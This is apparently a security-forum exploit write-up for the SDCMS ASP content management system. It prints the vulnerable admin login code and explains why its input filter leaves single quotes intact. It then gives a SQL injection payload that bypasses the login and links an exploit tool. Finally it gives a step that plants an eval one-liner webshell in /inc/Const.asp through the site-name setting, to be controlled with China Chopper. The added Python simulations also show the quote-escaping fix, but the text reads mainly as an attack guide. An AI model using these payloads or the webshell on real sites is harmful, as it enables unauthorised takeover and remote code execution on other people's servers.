Author: T00LS 鬼哥
Vulnerable file: <admin directory>/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1External form submissions are not allowed!":Exit Sub
    ' FilterText mode 1 only strips spaces, CR and LF (see below); single quotes survive
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "The system has blocked further logins for you today":died
    IF code="" Then Alert "Captcha cannot be empty!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "Captcha must be numeric!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "Wrong captcha!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "Username or password cannot be empty":died
    Else
        ' username is concatenated straight into the WHERE clause; password is hashed first, so only username is injectable
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"Login failed",1
            Echo "Wrong username or password, "&loginnum-errnum&" attempts left today"
        Else
            ' Any returned row counts as a login; the cookies are filled from that row (Rs(2) is the stored MD5 hash)
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"Login succeeded",1
            ' Automatically delete log entries older than 30 days (Access and SQL Server variants)
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the code of FilterText:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            ' Whitespace only: quotes, semicolons and comment markers all pass through
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            t0=Replace(t0,Chr(8),"")   'backspace
            t0=Replace(t0,Chr(9),"")   'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")  'line feed
            t0=Replace(t0,Chr(11),"")  'vertical tab
            t0=Replace(t0,Chr(12),"")  'form feed
            t0=Replace(t0,Chr(13),"")  'carriage return (Chr(13)&Chr(10) is the CR+LF pair)
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")  'space
            t0=Replace(t0,Chr(33),"")  '!
            t0=Replace(t0,Chr(34),"")  '"
            t0=Replace(t0,Chr(35),"")  '#
            t0=Replace(t0,Chr(36),"")  '$
            t0=Replace(t0,Chr(37),"")  '%
            t0=Replace(t0,Chr(38),"")  '&
            t0=Replace(t0,Chr(39),"")  ''
            t0=Replace(t0,Chr(40),"")  '(
            t0=Replace(t0,Chr(41),"")  ')
            t0=Replace(t0,Chr(42),"")  '*
            t0=Replace(t0,Chr(43),"")  '+
            t0=Replace(t0,Chr(44),"")  ',
            t0=Replace(t0,Chr(45),"")  '-
            t0=Replace(t0,Chr(46),"")  '.
            t0=Replace(t0,Chr(47),"")  '/
            t0=Replace(t0,Chr(58),"")  ':
            t0=Replace(t0,Chr(59),"")  ';
            t0=Replace(t0,Chr(60),"")  '<
            t0=Replace(t0,Chr(61),"")  '=
            t0=Replace(t0,Chr(62),"")  '>
            t0=Replace(t0,Chr(63),"")  '?
            t0=Replace(t0,Chr(64),"")  '@
            t0=Replace(t0,Chr(91),"")  '[
            t0=Replace(t0,Chr(92),"")  '\
            t0=Replace(t0,Chr(93),"")  ']
            t0=Replace(t0,Chr(94),"")  '^
            t0=Replace(t0,Chr(95),"")  '_
            t0=Replace(t0,Chr(96),"")  '`
            t0=Replace(t0,Chr(123),"") '{
            t0=Replace(t0,Chr(124),"") '|
            t0=Replace(t0,Chr(125),"") '}
            t0=Replace(t0,Chr(126),"") '~
        Case Else
            ' HTML-encode (the entities were rendered as plain characters on the original page)
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        t0=Replace(t0,"expression","e&#173;xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
See that? When the second argument is 1 it only strips:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

Spaces and line breaks are removed; single quotes, comment markers and everything else go straight into the query, so username is an injection point (a payload just must not contain literal spaces). This vulnerability lets you get the admin account and password directly. Note also from the code above that on a successful match the login writes the returned row's stored hash Rs(2) into the sdcms_pwd cookie and the submitted username into sdcms_name. SDCMS's default admin path is /admin/; if the webmaster has changed it, find it yourself!
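To make the point concrete, here is an added example (my own code, not SDCMS's) that ports only the Case "1" branch of FilterText and the string concatenation from Sub Check into Python, so you can see exactly which characters reach the database and what the WHERE clause becomes. The payload string is illustrative and assumed, not the one the EXP tool uses; the hardened variant shows the single-quote doubling that FilterText mode 1 never does.

```python
"""Added example, not SDCMS code: Python port of FilterText(t0, 1) and of the
login query built in Sub Check. PAYLOAD is an illustrative assumption."""
import hashlib


def vb_trim(s: str) -> str:
    """VBScript Trim() removes only spaces, not tabs or newlines."""
    return s.strip(" ")


def filter_text_mode1(t0: str) -> str:
    """Port of FilterText's Case "1": strips Chr(32), Chr(13) and Chr(10) only."""
    if not t0:
        return ""
    t0 = vb_trim(t0)
    for ch in ("\x20", "\x0d", "\x0a\x0a", "\x0a"):
        t0 = t0.replace(ch, "")
    return t0


def escape_sql_literal(value: str) -> str:
    """The fix FilterText never applies: double every single quote."""
    return value.replace("'", "''")


def build_login_query(raw_username: str, raw_password: str, hardened: bool = False) -> str:
    """Same SQL as Sub Check builds; password is hashed, so only username matters."""
    username = filter_text_mode1(vb_trim(raw_username))
    password = filter_text_mode1(vb_trim(raw_password))
    if hardened:
        username = escape_sql_literal(username)
    pwd_hash = hashlib.md5(password.encode("utf-8")).hexdigest()
    return ("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever "
            "From Sd_Admin Where Sdcms_name='" + username + "' "
            "And Sdcms_Pwd='" + pwd_hash + "'")


def where_clause(query: str) -> str:
    """Just the part after ' Where ', for easier inspection."""
    return query.split(" Where ", 1)[1]


# Illustrative payload (assumed, not from the page). No spaces, because mode 1
# would strip them. Two OR terms are needed because AND binds tighter than OR:
#   name='' OR '1'='1' OR ('1'='1' AND Sdcms_Pwd='<md5>')   -> always true
PAYLOAD = "'or'1'='1'or'1'='1"


if __name__ == "__main__":
    print(where_clause(build_login_query(PAYLOAD, "x")))
    print(where_clause(build_login_query(PAYLOAD, "x", hardened=True)))
```

Run it and compare the two WHERE clauses: in the first the quote in the payload closes the literal and the rest is parsed as SQL; in the hardened one every quote is doubled and the whole payload stays inside the Sdcms_name literal. A tab (Chr(9)) survives mode 1 as well, so a payload that needs separators can use tabs instead of spaces.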
EXP tool download (this tool only runs on XP): sdcms-EXP
Test:
Now enter the captcha into the tool and click OK.
As you can see, we land straight in the admin management interface, heh!
And that's how we got straight into the backend...
SDCMS privilege escalation:
Method 1: open /<admin directory>/sdcms_set.asp and append ":eval(request(Chr(63)))' to the "Site name" field. That is all it takes: the value is written into /inc/Const.asp as a one-liner webshell. Chr(63) is ?, so the one-liner's connection password is ?.
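The following is an added example (my own code, not SDCMS's) that simulates the site-name value being written into Const.asp. The exact line format in Const.asp is an assumption (Const Sdcms_SiteName="..."); the point it demonstrates is that an unescaped " ends the VBScript string literal, : starts a new statement, and the trailing ' comments out the rest of the line, whereas doubling the quotes keeps the whole value inside the literal.

```python
"""Added example, not SDCMS code. Simulates writing the sdcms_set.asp site
name into Const.asp; the Const line format is an assumption."""

# The payload from the write-up, appended to a site name: Chr(63) is "?", the webshell password.
PAYLOAD_SITE_NAME = 'MySite":eval(request(Chr(63)))\''


def render_const_line(value: str, escape: bool = False) -> str:
    """Assumed writer. VBScript escapes a double quote inside a literal as ""."""
    if escape:
        value = value.replace('"', '""')
    return 'Const Sdcms_SiteName="' + value + '"'


def code_outside_literal(line: str) -> str:
    """Return VBScript code that lands outside the first string literal on the line,
    with a trailing ' comment removed (a ' outside a string starts a comment)."""
    i = line.index('"') + 1
    while i < len(line):
        if line[i] == '"':
            if i + 1 < len(line) and line[i + 1] == '"':  # doubled quote: still inside the literal
                i += 2
                continue
            rest = line[i + 1:]
            return rest.split("'", 1)[0].strip()
        i += 1
    return ""  # literal runs to end of line: nothing executes


def injected_code(site_name: str, escape: bool) -> str:
    """What VBScript would execute besides the Const assignment itself."""
    return code_outside_literal(render_const_line(site_name, escape))


if __name__ == "__main__":
    print(render_const_line(PAYLOAD_SITE_NAME))
    print("executes:", injected_code(PAYLOAD_SITE_NAME, escape=False) or "(nothing)")
    print(render_const_line(PAYLOAD_SITE_NAME, escape=True))
    print("executes:", injected_code(PAYLOAD_SITE_NAME, escape=True) or "(nothing)")
```

With escape=False the rendered line is Const Sdcms_SiteName="MySite":eval(request(Chr(63)))'" and the eval runs on every page that includes Const.asp; with escape=True the same value is an inert string.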
OK, now connect to it with 菜刀 (China Chopper)!